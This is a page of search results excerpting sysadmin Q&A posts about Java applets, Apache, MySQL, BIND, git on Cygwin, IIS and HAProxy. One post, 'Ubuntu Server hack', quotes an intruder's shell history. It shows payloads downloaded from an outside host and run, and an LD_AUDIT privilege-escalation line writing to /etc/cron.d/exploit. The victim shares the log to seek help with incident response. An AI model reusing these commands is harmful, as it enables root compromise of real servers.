Search Results

Search found 7323 results on 293 pages for 'cache manifest'.

Page 236/293 | < Previous Page | 232 233 234 235 236 237 238 239 240 241 242 243  | Next Page >

  • ClassNotFoundException returned for all plugins

    - by razumny
    I am trying to use a Java applet (any Java applet), but I always get a message saying "Error. Click for details". When I do so, the pop-up says: Application Error ClassNotFoundException jreVerification.class When I click the "Details" button, all I see is the following: Java Plug-in 10.7.2.10 Using JRE version 1.7.0_07-b10 Java HotSpot(TM) Client VM User home directory = C:\Users\razumny ---------------------------------------------------- c: clear console window f: finalize objects on finalization queue g: garbage collect h: display this help message l: dump classloader list m: print memory usage o: trigger logging q: hide console r: reload policy configuration s: dump system and deployment properties t: dump thread list v: dump thread stack x: clear classloader cache 0-5: set trace level to <n> ---------------------------------------------------- I am running Windows 7 Professional, and am up to date on patches. The problem occurs in Google Chrome, Mozilla Firefox and Internet Explorer, regardless of which Java applet I am running. The error I quoted above came from here: http://java.com/en/download/installed.jsp?detect=jre I have attempted the following to rectify the issue: Uninstall and reinstall Java Uninstall Java, reboot, install Java Uninstall Java, delete all registry entries, reboot, install Java In addition, I have run malware and virus scans, none of which have shown anything of relevance. At this point, I am at my wit's end, and so, I turn to you.

    Read the article

  • Why is my apache2, mod_fcgid, php configuration causing 100% cpu usage?

    - by Scott Lundgren
    Page load makes a quick initial connection, then hangs about 10 seconds before the page renders. When the server load goes up I start watching top & I see that both CPUs get pegged at times to 100% by 4-8 php-cgi processes. My theory is that since RAM usage never goes above 50%, Apache is able to handle the requests coming in, but is queueing them up for PHP to process. What is wrong with my mod_fcgid/php configuration? RHEL 5.4 2 Xeon E5420s @ 2.50 GHz 4 GB RAM Apache 2.2.3 Timeout 30 KeepAlive On MaxKeepAliveRequests 0 KeepAliveTimeout 5 <IfModule worker.c> StartServers 2 MaxClients 300 MinSpareThreads 25 MaxSpareThreads 75 ThreadsPerChild 25 MaxRequestsPerChild 0 </IfModule> mod_fcgid 2.2.10 LoadModule fcgid_module modules/mod_fcgid.so <IfModule !mod_fastcgi.c> AddHandler fcgid-script fcg fcgi fpl php </IfModule> SocketPath run/mod_fcgid SharememPath run/mod_fcgid/fcgid_shm DefaultInitEnv PHPRC "/etc/" FCGIWrapper /usr/bin/php-cgi .php MaxRequestsPerProcess 1500 MaxProcessCount 20 IPCCommTimeout 240 IdleTimeout 240 APC 3.0.19 extension = apc.so apc.enabled=1 apc.shm_segments=1 apc.optimization=0 apc.shm_size=32 apc.ttl=7200 APC cache is 43% used with a 99% hit rate
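
    One thing worth checking, sketched below purely as a hypothesis: php-cgi exits after PHP_FCGI_MAX_REQUESTS requests (500 by default), so a MaxRequestsPerProcess of 1500 leaves mod_fcgid respawning interpreters far more often than it expects, and MaxProcessCount 20 allows more php-cgi workers than the eight cores can service at once. The directive names follow the mod_fcgid 2.2.x config quoted above; the values are illustrative, not a confirmed fix.

        # sketch only -- align PHP's own request limit with mod_fcgid's,
        # and cap the worker count near the number of cores
        DefaultInitEnv PHPRC "/etc/"
        DefaultInitEnv PHP_FCGI_MAX_REQUESTS 1500
        FCGIWrapper /usr/bin/php-cgi .php
        MaxRequestsPerProcess 1500
        MaxProcessCount 8
        IPCCommTimeout 240
        IdleTimeout 240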

    Read the article

  • MySQL is killing the server IO.

    - by OneOfOne
    I manage a fairly large/busy vBulletin forum (running on gigenet cloud), the database is ~10 GB (~9 million posts, ~60 queries per second), and lately MySQL has been grinding the disk like there's no tomorrow according to iotop and slowing the site. The last idea I can think of is using replication, but I'm not sure how much that would help and I'm worried about database sync. I'm out of ideas, any tips on how to improve the situation would be highly appreciated. Specs: Debian Lenny 64bit ~12Ghz (6 cores) CPU, 7520gb RAM, 160gb disk. Kernel: 2.6.32-4-amd64 mysqld Ver 5.1.54-0.dotdeb.0 for debian-linux-gnu on x86_64 ((Debian)) Other software: vBulletin 3.8.4 memcached 1.2.2 PHP 5.3.5-0.dotdeb.0 (fpm-fcgi) (built: Jan 7 2011 00:07:27) lighttpd/1.4.28 (ssl) - a light and fast webserver PHP and vBulletin are configured to use memcached. MySQL Settings: [mysqld] key_buffer = 128M max_allowed_packet = 16M thread_cache_size = 8 myisam-recover = BACKUP max_connections = 1024 query_cache_limit = 2M query_cache_size = 128M expire_logs_days = 10 max_binlog_size = 100M key_buffer_size = 128M join_buffer_size = 8M tmp_table_size = 16M max_heap_table_size = 16M table_cache = 96 Other: > vmstat procs -----------memory---------- ---swap-- -----io---- -system-- ----cpu---- r b swpd free buff cache si so bi bo in cs us sy id wa 9 0 73140 36336 8968 1859160 0 0 42 15 3 2 6 1 89 5 > /etc/init.d/mysql status Threads: 49 Questions: 252139 Slow queries: 164 Opens: 53573 Flush tables: 1 Open tables: 337 Queries per second avg: 61.302. Edit: Additional info.
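
    A direction worth exploring before replication, sketched with illustrative values only (the variable names are standard MySQL 5.1 settings, but the sizes must be tuned against the RAM actually available on the box): vBulletin on MyISAM leans heavily on the key buffer and the table cache, and 128M of key buffer against a ~10 GB database pushes most index reads straight to disk.

        [mysqld]
        # sketch -- assumes the forum tables are MyISAM, as the settings above suggest
        key_buffer_size     = 1G     # index cache; 128M is small for a ~10 GB database
        table_cache         = 512    # 96 is low for vBulletin's table count (note "Opens: 53573")
        tmp_table_size      = 64M
        max_heap_table_size = 64M    # keep implicit temporary tables in memory
        query_cache_size    = 64M    # an oversized query cache can add lock contention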

    Read the article

  • Apache in OS X not displaying localhost nor vhosts correctly

    - by Marcus
    I've encountered a really odd problem in my development environment, and I really can't make any sense of it. It started when a locally developed PHP site refused to update any content I edited in a file – no text, nothing. So if the document was: <h2>Hello!</h2> and I edited it to <h2>What's wrong?!</h2> it still output <h2>Hello!</h2>. I thought it was some kind of caching problem, but no "hard reloads" in the browser nor sudo apachectl -k restart sorted it out. Only a restart of my Mac did finally fix it. Now, a few days later even stranger issues are appearing. I have a LAMP stack installed via Homebrew, in httpd-vhosts.conf I've set ~/Dev/ as my localhost, and I set up a <VirtualHost *:80> for each project ("ServerName projectname.dev" for example). However, whatever files or folders I put in ~/Dev/ have stopped showing up on localhost, and new VirtualHost directives don't work. Three projects + "docs" in the folder: But "localhost" only displays the two older projects...? So, as I've said – I've tried restarting Apache (without errors), clearing browser caches (tried in three browsers, Chrome, Safari and Firefox) and even rebooting the Mac. Nothing. Any ideas? Running OS X 10.8.5 and Apache 2.2.24.

    Read the article

  • Problems forwarding a zone to another DNS server

    - by sebastian nielsen
    I have an authoritative DNS server at 83.248.21.18 which is authoritative for the domain "finahemgoteborg.se". Now my registrar is requiring me to have 2 DNS servers for the domain, so I would now want the machine 85.228.103.141 to just forward all incoming queries for "finahemgoteborg.se" to the 83.248.21.18 server. In the 85.228.103.141 BIND server, I have the following config: zone "finahemgoteborg.se" in { type forward; forwarders {83.248.21.18;}; }; But the problem is that 85.228.103.141 is still responding with "REFUSED" when I query it for, for example, the www.finahemgoteborg.se A record. How can I fix it? I do NOT want to set up a master/slave situation, just one nameserver that forwards to another. Edit: The rest of named.conf: options { directory "/var/cache/bind"; version "none"; allow-recursion {"none";}; minimal-responses no; }; zone "sebn.us.to" in{ type master; file "/etc/bind/sebn.us.to"; }; zone "ns1sebn.us.to" in{ type master; file "/etc/bind/sebn.us.to"; }; zone "ns2sebn.us.to" in{ type master; file "/etc/bind/sebn.us.to"; }; zone "finahemgoteborg.se" in{ type forward; forwarders {83.248.21.18;}; };
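
    One likely explanation, offered as a sketch rather than a confirmed fix: in BIND, answering from a forward zone is a recursive operation, so with allow-recursion {"none";} in the options block the server refuses those queries. The ACL below is illustrative and should be tightened to whichever clients actually need answers.

        options {
            directory "/var/cache/bind";
            version "none";
            // forwarding is handled as recursion, so it must be allowed
            // for the clients expected to query this zone
            allow-recursion { any; };
            minimal-responses no;
        };

        zone "finahemgoteborg.se" in {
            type forward;
            forward only;              // never fall back to iterative resolution
            forwarders { 83.248.21.18; };
        };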

    Read the article

  • I cannot access Windows Update at all

    - by Cardinal fang
    I have been unable to access the Windows Update site for a couple of weeks now. I just get a message saying "Internet Explorer cannot display the webpage" and saying I have connection problems. The same thing happens with any other Microsoft site I try to access. The Automatic Updates also do not work. I can access every other website I've surfed to. I've tried Googling the problem, and based on what other sites have suggested I have cleared my cache and temp files. I've scanned my hard drive with my antivirus in case I have a virus (nada). I've tried turning off my firewall and anti-virus (I run Zone Alarm). I've downloaded SpyBot and scanned my drive with that in case something was missed by Zone Alarm (again nada). Based on suggestions from the smart cookies on the Bad Science forum, I've used nslookup to check my translation isn't wonky (got all the info they said I should get). I've also tried navigating there directly using the IP address I was given (nope). I normally access the internet through a 3 mobile broadband connection, but have also tried connecting using a mate's wi-fi connection in case it was something on my mobile modem interfering. I run Windows XP SP3 with Internet Explorer 7 and Zone Alarm Internet Security Suite as my anti-virus/firewall. Any suggestions?

    Read the article

  • getent passwd fails, getent group works?

    - by slugman
    I've almost got my AD integration working completely on my OpenSUSE 12.1 server. I have an OpenSUSE 11.4 system successfully integrated into our AD environment. (Meaning, we use LDAP to authenticate to the AD directory via Kerberos, so we can log in to our *nix systems as AD users, using the name service caching daemon to cache our passwords and groups.) Also, important to note: these systems are on our LAN, and SSL authentication is disabled. I am almost all the way there. nss_ldap is finally authenticating with the LDAP server (as /var/log/messages shows), but right now I have another problem: getent passwd and getent shadow fail (they show local accounts only), but getent group works! getent group shows all my AD groups! I copied over the relevant configuration files from my working OpenSUSE 11.4 box: /etc/krb5.conf /etc/nsswitch.conf /etc/nscd.conf /etc/samba/smb.conf /etc/sssd/sssd.conf /etc/pam.d/common-session-pc /etc/pam.d/common-account-pc /etc/pam.d/common-auth-pc /etc/pam.d/common-password-pc I didn't modify anything between the two. I really don't think I need to modify anything, because getent passwd, getent shadow, and getent group all work fine on the OpenSUSE 11.4 box. Attempting to restart the nscd service unfortunately didn't do much, and neither did running /usr/sbin/nscd -i passwd. Do any of you admin-gurus have any suggestions? Honestly, I'm happy I made it this far. I'm almost there guys!
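
    A sketch of what to compare, under the assumption that the new box resolves accounts through sssd (the sssd.conf in the copied list suggests it might): sssd does not enumerate domain accounts by default, so getent passwd can list only local users even when lookups by name succeed, and the nsswitch passwd/shadow lines have to name the same sources as the working 11.4 machine. The domain section name below is hypothetical.

        # /etc/nsswitch.conf -- the lines worth diffing against the 11.4 box
        passwd: compat sss   # or "files ldap", matching whatever the 11.4 box uses
        shadow: compat sss
        group:  compat sss   # group already resolves, so this source is evidently wired up

        # /etc/sssd/sssd.conf -- enumeration is off by default
        [domain/EXAMPLE.COM]
        enumerate = True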

    Read the article

  • Ubuntu Server hack

    - by haxpanel
    Hi! I looked at netstat and I noticed that someone besides me is connected to the server by ssh. I looked into this because my user is the only one with SSH access. I found this in an FTP user's .bash_history file: w uname -a ls -a sudo su wget qiss.ucoz.de/2010/.jpg wget qiss.ucoz.de/2010.jpg tar xzvf 2010.jpg rm -rf 2010.jpg cd 2010/ ls -a ./2010 ./2010x64 ./2.6.31 uname -a ls -a ./2.6.37-rc2 python rh2010.py cd .. ls -a rm -rf 2010/ ls -a wget qiss.ucoz.de/ubuntu2010_2.jpg tar xzvf ubuntu2010_2.jpg rm -rf ubuntu2010_2.jpg ./ubuntu2010-2 ./ubuntu2010-2 ./ubuntu2010-2 cat /etc/issue umask 0 dpkg -S /lib/libpcprofile.so ls -l /lib/libpcprofile.so LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping ping gcc touch a.sh nano a.sh vi a.sh vim wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh nano ubuntu10.sh ls -a rm -rf ubuntu10.sh . .. a.sh .cache ubuntu10.sh ubuntu2010-2 ls -a wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh ls -a rm -rf ubuntu10.sh wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe rm -rf W2Ksp3.exe passwd The system is in a jail. Does it matter in the current case? What shall I do? Thanks, everyone! I have done these: - banned the connected ssh host with iptables - stopped the sshd in the jail - saved: bash_history, syslog, dmesg, and the files from the bash_history's wget lines
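
    A few follow-up checks, sketched from what the history itself reveals (the LD_AUDIT/libpcprofile trick writes to /etc/cron.d/exploit, and the downloads came from qiss.ucoz.de); paths and time windows are illustrative, and this is triage rather than a substitute for rebuilding a compromised host.

        ls -l /etc/cron.d/                        # the exploit line in the history targets /etc/cron.d/exploit
        cat /etc/cron.d/exploit 2>/dev/null
        find / -xdev -perm -4000 -mtime -30 -ls   # setuid binaries added recently
        last -a | head -n 20                      # logins around the time of those commands
        grep -r "qiss.ucoz.de" /var/log 2>/dev/null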

    Read the article

  • setting up git on cygwin - openssl

    - by Pete Field
    I'm trying to get git running in Cygwin on a Windows 7 machine. I have git unpacked in the directory git-1.7.1.1. When I run make install from within that directory, I get CC fast-import.o In file included from builtin.h:4, from fast-import.c:147: git-compat-util.h:136:19: iconv.h: No such file or directory git-compat-util.h:140:25: openssl/ssl.h: No such file or directory git-compat-util.h:141:25: openssl/err.h: No such file or directory In file included from builtin.h:6, from fast-import.c:147: cache.h:9:21: openssl/sha.h: No such file or directory In file included from fast-import.c:156: csum-file.h:10: error: parse error before "SHA_CTX" csum-file.h:10: warning: no semicolon at end of struct or union csum-file.h:15: error: 'crc32' redeclared as different kind of symbol /usr/include/zlib.h:1285: error: previous declaration of 'crc32' was here csum-file.h:15: error: 'crc32' redeclared as different kind of symbol /usr/include/zlib.h:1285: error: previous declaration of 'crc32' was here csum-file.h:17: error: parse error before '}' token fast-import.c: In function `store_object': fast-import.c:995: error: `SHA_CTX' undeclared (first use in this function) fast-import.c:995: error: (Each undeclared identifier is reported only once fast-import.c:995: error: for each function it appears in.) fast-import.c:995: error: parse error before "c" fast-import.c:1000: warning: implicit declaration of function `SHA1_Init' fast-import.c:1000: error: `c' undeclared (first use in this function) fast-import.c:1001: warning: implicit declaration of function `SHA1_Update' fast-import.c:1003: warning: implicit declaration of function `SHA1_Final' fast-import.c: At top level: fast-import.c:1118: error: parse error before "SHA_CTX" fast-import.c: In function `truncate_pack': fast-import.c:1120: error: `to' undeclared (first use in this function) fast-import.c:1126: error: dereferencing pointer to incomplete type fast-import.c:1127: error: dereferencing pointer to incomplete type fast-import.c:1128: error: dereferencing pointer to incomplete type fast-import.c:1128: error: `ctx' undeclared (first use in this function) fast-import.c: In function `stream_blob': fast-import.c:1140: error: `SHA_CTX' undeclared (first use in this function) fast-import.c:1140: error: parse error before "c" fast-import.c:1154: error: `pack_file_ctx' undeclared (first use in this function) fast-import.c:1154: error: dereferencing pointer to incomplete type fast-import.c:1160: error: `c' undeclared (first use in this function) make: *** [fast-import.o] Error 1 I'm guessing that most of these errors are due to the iconv.h and openssl files which apparently are missing, but I can't figure out how I'm supposed to install those (if I am), or if there is some other way to get around this.
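
    Two possible ways forward, sketched under the assumption that the missing headers come from Cygwin's libiconv-devel, openssl-devel and zlib development packages (the exact package names should be verified in the Cygwin installer):

        # install the development headers through Cygwin's setup.exe (quiet mode, named packages)
        setup.exe -q -P libiconv-devel,openssl-devel,zlib-devel

        # or build git without its OpenSSL and iconv dependencies
        make NO_OPENSSL=1 NO_ICONV=1 prefix=/usr/local install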

    Read the article

  • Interruptionless Uploads / Rollback in IIS

    - by NickatUship
    I'm not sure if this is the right way to ask this question, but here's basically what I'd like to do: 1.) Push a changeset to a site in IIS. 2.) Don't interrupt the users. 3.) Be able to roll back effortlessly. So, there are a few things that I know have to happen: 1.) Out of Proc session - handled 2.) Out of Proc cache - handled So the questions that remain: 1.) How do I keep from interrupting the users? If I just upload the files to bin, the app recycles and takes 10+ seconds to come back online. 2.) How do I roll back effortlessly? I was thinking a possible solution would be to have two sites set up in IIS, one public and one private. Uploads go to private and get warmed up. After warmup, the sites are swapped. A rollback only entails swapping to private without an upload. This seems sound in theory, but I'm not sure of the mechanics. Any ideas?
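
    A sketch of the swap mechanics, assuming the two IIS sites are named "MySite-Public" and "MySite-Private" (the names and hostnames here are hypothetical): rebinding with appcmd is one way to flip which site answers the public hostname, and running the same two commands in reverse is the rollback.

        REM move the current public site aside first, then promote the warmed-up private site
        %windir%\system32\inetsrv\appcmd set site /site.name:"MySite-Public" /bindings:http/*:8080:staging.example.com
        %windir%\system32\inetsrv\appcmd set site /site.name:"MySite-Private" /bindings:http/*:80:www.example.com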

    Read the article

  • How do you enable View Source in IE8 when it gets magically disabled

    - by Tim Meers
    I have multiple computers that all seem to have View Source disabled in the context menu when you right-click on a web page. Now I know it's not that the web page is somehow disabling it; I'm pretty sure that's not even possible. But alas I have at least 3 machines in my office (not on AD) that have this problem. I have also worked on clients' computers that have this same issue. It's downright maddening! I tried to Google for it, but it just shows results from the dawn of IE6 in all of its "glory", with a bug where if the cache was full it would be disabled. But this is not the case in IE8. Anybody have a clue why this is happening, or a fix for it? Maybe a reg setting? Update: So I got a little closer to solving it, but there was still an issue on one computer where it allowed it in HTTP, but not in HTTPS. One other computer works correctly in both. I found these two keys missing in the registry: [-HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\View Source Editor] [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\View Source Editor]
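
    A hedged place to look besides the View Source Editor keys: IE also honours a NoViewSource restriction policy, and querying both hives first avoids deleting something a domain policy will simply re-apply. The commands below are a sketch.

        REM check for the restriction policy before changing anything
        reg query "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v NoViewSource
        reg query "HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v NoViewSource
        reg delete "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v NoViewSource /f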

    Read the article

  • Disable RAID to JBOD in server IBM x3400 M2

    - by BanKtsu
    I just want to disable the default RAID in my IBM System x3400 M2 server (7837-24X); I have 3 SAS disk drives. I want to make them a JBOD ("Just a Bunch Of Disks"), because I want to install CentOS on drive 0 and use the other two as cache disks for a Squid server. I disabled the RAID in the BIOS: System Settings/Adapters and UEFI drivers/LSI Logic Fusion MPT SAS Driver -PciRoot(0x0)/Pci(0x3,0X0)/Pci(0x0,0x0) LSI Logic MPT Setup Utility RAID Properties/Delete Array Later I booted the CentOS live CD and installed the OS on drive 0, with the other 2 mounted like this: *LVM Volume Groups vg_proxyserver 139508 lv_root 51200 / ext4 lv_home 84276 /home ext4 lv_swap 4032 Hard Drive sdb(/dev/sdb) free 140011 sdc(/dev/sdc) free 140011 sdd(/dev/sdd) sdd1 500 /boot ext4 sdd2 139512 vg_proxyserver physical volume(LVM) But when I restart, the server gives me the error: Boot failed Hard Disk 0 UEFI PXE PciRoot(0x0)/Pci(0x1,0X0)/Pci(0x0,0x0)/MAC(001A64B15130,0X0)) ........PXE-E18:Server response timeout. UEFI PXE PciRoot(0x0)/Pci(0x1,0X0)/Pci(0x0,0x0)/MAC(001A64B15132,0X0)) ........PXE-E18:Server response timeout. and the OS does not start. Does the IBM force me to use RAID? Why?

    Read the article

  • Roaming Profiles & Redirected Folders - storage consumption? offline files and caching?

    - by Ben Swinburne
    I understand the concepts of both roaming profiles and folder redirection and have used both separately before. I am about to set up a network from scratch and would ideally like to use both, primarily for the following reasons: roaming profiles allow users to log on to any machine and have their profile; redirected folders allow users to have their My Documents and Desktop etc. backed up without the need to log off at the end of the day. The servers can run their backups overnight and there are no missing files due to the user not logging off. Redirected folders also largely alleviate the slow log-in times caused by large profiles. My question is: if some of the folders are redirected and therefore not part of the roaming profile, what happens on machines which truly roam (i.e. laptops)? If there are offline files or a cache, does this mean that the problem whereby a user has to log off comes back? By having them both enabled, is there any duplication, i.e. if I have a users$ share and a profiles$ share, would I have Desktop twice, for example?

    Read the article

  • How can I get Haproxy to not log local requests?

    - by coneybeare
    I am trying to clean out some of the log clutter from my machines and am starting by removing requests that are generated by the servers themselves. I have cache warmers running around the clock and I don't want these polluting the logs. I was able to get Apache to stop logging local requests by adding a dontlog for the local IP: SetEnvIf Remote_Addr "RE\.DA\.CT\.ED" dontlog CustomLog "|logger -p local3.info -t http" combined env=!dontlog and now I am looking for something similar to put in a configuration for the Haproxy log. How can I prevent 127.0.0.1 requests from writing to the Haproxy log? UPDATE: 2/15/11 I use the excellent loggly service to pull out logs in the cloud, but I am seeing tons of logs like this: 2011 Feb 15 06:09:42.000 ip-10-251-194-96 http: RE.DA.CT.ED - - [15/Feb/2011:06:09:42 -0500] "HEAD /search/Nevad/predictive/txt HTTP/1.0" 200 - "-" "Wget/1.10.2 (Red Hat modified)" 2011 Feb 15 06:09:42.000 127.0.0.1 haproxy[10390]: 127.0.0.1:58408 [15/Feb/2011:06:09:42] www i-5dd7a331.0 0/0/0/8/8 200 210 - - --NI 0/0/0 0/0 "HEAD /search/Nevad/predictive/txt HTTP/1.1" and I want them gone. This question focuses on how to stop that haproxy log line from being written to the server-side log in the first place.
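
    A sketch of one approach, with the caveat that it needs a HAProxy version that supports http-request set-log-level (the frontend and ACL names below are illustrative); older releases generally have to fall back to filtering in syslog instead.

        frontend www
            acl local_probe src 127.0.0.1
            http-request set-log-level silent if local_probe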

    Read the article

  • site to listen on port 88

    - by JohnMerlino
    I want to get one of my sites to listen on port 88. In ports.conf in /etc/apache2 on the Ubuntu server, I added the following so the web app can listen on port 88: NameVirtualHost *:80 Listen 80 NameVirtualHost *:88 Listen 88 In my /etc/apache2/apache2.conf I have this: # Include the virtual host configurations: Include sites-enabled/ Under sites-enabled, I have a file that looks like this: Listen *:88 NameVirtualHost *:88 <VirtualHost *:88> ServerName dogtracking.com DocumentRoot /home/doggps/public_html/eaglegps.com/current/public <Directory /home/doggps/public_html/eaglegps.com/current/public> AllowOverride all Options -MultiViews </Directory> <LocationMatch "^/assets/.*$"> Header unset ETag FileETag None # RFC says only cache for 1 year ExpiresActive On ExpiresDefault "access plus 1 year" </LocationMatch> </VirtualHost> Then I try to restart apache: /etc/init.d/apache2 restart And I get: * Restarting web server apache2 /usr/sbin/apache2ctl: line 87: ulimit: open files: cannot modify limit: Operation not permitted Warning: DocumentRoot [/home/xtreme/Sites/DogGPS-CMS] does not exist apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName [Thu Oct 18 18:04:21 2012] [warn] NameVirtualHost *:88 has no VirtualHosts /usr/sbin/apache2ctl: line 87: ulimit: open files: cannot modify limit: Operation not permitted Warning: DocumentRoot [/home/xtreme/Sites/DogGPS-CMS] does not exist apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName [Thu Oct 18 18:04:22 2012] [warn] NameVirtualHost *:88 has no VirtualHosts (13)Permission denied: make_sock: could not bind to address 0.0.0.0:80 no listening sockets available, shutting down Unable to open logs Action 'start' failed.
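
    A sketch of a cleanup worth trying, offered as an assumption rather than a confirmed diagnosis: the output suggests Listen/NameVirtualHost for :88 are declared both in ports.conf and in the vhost file, the restart is not running with enough privilege to bind port 80 (hence the make_sock permission error, so run it with sudo), and a leftover site still points at /home/xtreme/Sites/DogGPS-CMS. Keeping the Listen directives in ports.conf only would look roughly like this:

        # /etc/apache2/ports.conf -- declare each port exactly once
        NameVirtualHost *:80
        Listen 80
        NameVirtualHost *:88
        Listen 88

        # /etc/apache2/sites-enabled/dogtracking -- no Listen/NameVirtualHost here
        <VirtualHost *:88>
            ServerName dogtracking.com
            DocumentRoot /home/doggps/public_html/eaglegps.com/current/public
            # ... Directory and caching directives as in the original file ...
        </VirtualHost>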

    Read the article

  • CC.NET + SVN : Server certificate issue

    - by MSI
    I am trying to set up continuous integration in our office. Being a puny little developer I am facing this supposedly infamous problem: "Source control operation failed: svn: OPTIONS of 'https://trunkURL': Server certificate verification failed: issuer is not trusted" So I tried the following solution: run the CC.NET service (the server runs as a Windows service) using a domain account (rather than the default LOCAL SYSTEM) and accept the cert permanently from a command prompt under that user by running svn log/list on the repo. Doesn't help :(. I am getting the following from my artifact/log files (or dashboard): ThoughtWorks.CruiseControl.Core.CruiseControlException: Source control operation failed: svn: OPTIONS of 'https://TrunkURL': Server certificate verification failed: issuer is not trusted (https://ServerAdd) . Process command: E:\(svn.exe Path) log https://TrunkURL -r "{2010-11-08T02:12:20Z}:{2010-11-08T02:13:21Z}" --verbose --xml --no-auth-cache --non-interactive at ThoughtWorks.CruiseControl.Core.Sourcecontrol.ProcessSourceControl.Execute(ProcessInfo processInfo) at ThoughtWorks.CruiseControl.Core.Sourcecontrol.Svn.GetModifications(IIntegrationResult from, IIntegrationResult to) at ThoughtWorks.CruiseControl.Core.Sourcecontrol.QuietPeriod.GetModificationsWithLogging(ISourceControl sc, IIntegrationResult from, IIntegrationResult to) at ThoughtWorks.CruiseControl.Core.Sourcecontrol.QuietPeriod.GetModifications(ISourceControl sourceControl, IIntegrationResult lastBuild, IIntegrationResult thisBuild) at ThoughtWorks.CruiseControl.Core.IntegrationRunner.GetModifications(IIntegrationResult from, IIntegrationResult to) at ThoughtWorks.CruiseControl.Core.IntegrationRunner.Integrate(IntegrationRequest request) We are using VisualSVN Server and CC.NET for this adventure. Tips and suggestions will be highly appreciated. Thanks
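
    A sketch of an alternative to relying on the runtime auth cache (which the --no-auth-cache flag in the logged command may be sidestepping anyway): export the VisualSVN server certificate to a file and declare it as a trusted authority in the Subversion servers config of the account the CC.NET service runs under. The path and profile location below are hypothetical.

        # %APPDATA%\Subversion\servers for the CC.NET service account
        [global]
        # certificate exported from the VisualSVN server (Base-64 encoded .cer/.pem)
        ssl-authority-files = C:\BuildTools\certs\visualsvn-server.pem
        # ssl-trust-default-ca = yes   # only if the cert chains to a CA Windows already trusts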

    Read the article

  • Setting up a low-cost image storage server with a 24x SSD array to get high IOPS?

    - by Nenad
    I want to build, let's name it, a lowcost Ra*san which would host the images (many millions) for our social site. We have 5 sizes of every photo, at 3 KB, 7 KB, 15 KB, 25 KB and 80 KB per image. My idea is to build a server with 24x consumer 240 GB SSDs in RAID 6, which will give me some 5 TB of disk space for the photo storage. To have HA I can add a 2nd one and use DRBD. I'm looking to get above 150'000 IOPS (4K random reads). As we mostly have read access only and rarely delete photos, I think I'll go with consumer MLC SSDs. I read many endurance reviews and don't see a problem there as long as we don't rewrite the cells. What do you think about my idea? - I'm not sure between RAID 6 or RAID 10 (more IOPS, but higher SSD cost). - Is ext4 OK for the filesystem? - Would you use 1 or 2 RAID controllers, with an expander backplane? If anyone has built something similar I would be happy to get real-world numbers. UPDATE: I have bought 12 (plus some spares) OCZ Talos 480GB SAS SSD drives. They will be placed in a 12-bay DAS and attached to a PERC H800 (1GB NV cache, manufactured by LSI, with FastPath) controller; I plan to set up RAID 50 with ext4. If someone is wondering about some benchmarks, let me know what you would like to see.

    Read the article

  • Use subpath internal proxy for subdomains, but redirect external clients if they ask for that subpath?

    - by HostileFork
    I have a VirtualHost that I'd like to have several subdomains on. (For the sake of clarity, let's say my domain is example.com and I'm just trying to get started by making foo.example.com work, and build from there.) The simplest way I found for a subdomain to work non-invasively with the framework I have was to proxy to a sub-path via mod_rewrite. Thus paths would appear in the client's URL bar as http://foo.example.com/(whatever) while they'd actually be served http://foo.example.com/foo/(whatever) under the hood. I've managed to do that inside my VirtualHost config file like this: ServerAlias *.example.com RewriteEngine on RewriteCond %{HTTP_HOST} ^foo\.example\.com [NC] # <--- RewriteCond %{REQUEST_URI} !^/foo/.*$ [NC] # AND is implicit with above RewriteRule ^/(.*)$ /foo/$1 [PT] (Note: It was surprisingly hard to find that particular working combination. Specifically, the [PT] seemed to be necessary on the RewriteRule. I could not get it to work with examples I saw elsewhere like [L] or trying just [P]. It would either not show anything or get in loops. Also some browsers seemed to cache the response pages for the bad loops once they got one... a page reload after fixing it wouldn't show it was working! Feedback welcome—in any case—if this part can be done better.) Now I'd like to make what http://foo.example.com/foo/(whatever) provides depend on who asked. If the request came from outside, I'd like the client to be permanently redirected by Apache so they get the URL http://foo.example.com/(whatever) in their browser. If it came internally from the mod_rewrite, I want the request to be handled by the web framework...which is unaware of subdomains. Is something like that possible?
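
    One common way to tell the two cases apart, sketched here rather than taken from the original setup: %{THE_REQUEST} holds the request line the client actually sent and is not changed by internal substitutions, so it only matches /foo/... when an outside client typed it, while the internal proxying rule keeps using %{REQUEST_URI} as before.

        RewriteEngine on

        # external clients asking for /foo/... directly get bounced to the clean URL
        RewriteCond %{HTTP_HOST} ^foo\.example\.com [NC]
        RewriteCond %{THE_REQUEST} ^[A-Z]+\ /foo/ [NC]
        RewriteRule ^/foo/(.*)$ http://foo.example.com/$1 [R=301,L]

        # everything else is mapped onto the framework's sub-path internally
        RewriteCond %{HTTP_HOST} ^foo\.example\.com [NC]
        RewriteCond %{REQUEST_URI} !^/foo/.*$ [NC]
        RewriteRule ^/(.*)$ /foo/$1 [PT]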

    Read the article

  • Datawind Ubislate 9ci tablet computer hanging on boot

    - by user57924
    I am new to this forum. I purchased a new tablet, a Datawind Ubislate 9ci. It is a 9 inch tablet without Bluetooth. Details: Android 4.1.1, Rockchip RK2928, kernel Linux version 3.0.36. I was trying to install CWM through Mobile Odin and ROM Manager but my tablet was not supported, so I downloaded a build.prop editor from Google Play and changed it to some other CWM-recognizable model, viz. Samsung, Nexus etc. While I was doing the above-mentioned procedure, my tablet suddenly started hanging at the boot screen and not opening. I went to recovery and tried to do a wipe data/factory reset, but it still fails to open after boot. The Android system recovery (3e) has the following options: 1) reboot system now 2) apply update from ADB 3) apply update from external storage 4) update rkimage from external storage 6) wipe data factory reset 7) wipe cache partition 8) recovery system from back up. I tried to do the wipe data/factory reset 2-3 times but it is still hanging at boot. I had not made any backup before this bootloop, and I also tried a hard reset by pressing a needle at the back. Please, somebody, help me to get rid of this problem and also tell me how to unlock the bootloader. Thank you.

    Read the article

  • Updated my WAMP Server and MySQL is eating up 580 MB of memory

    - by Jon
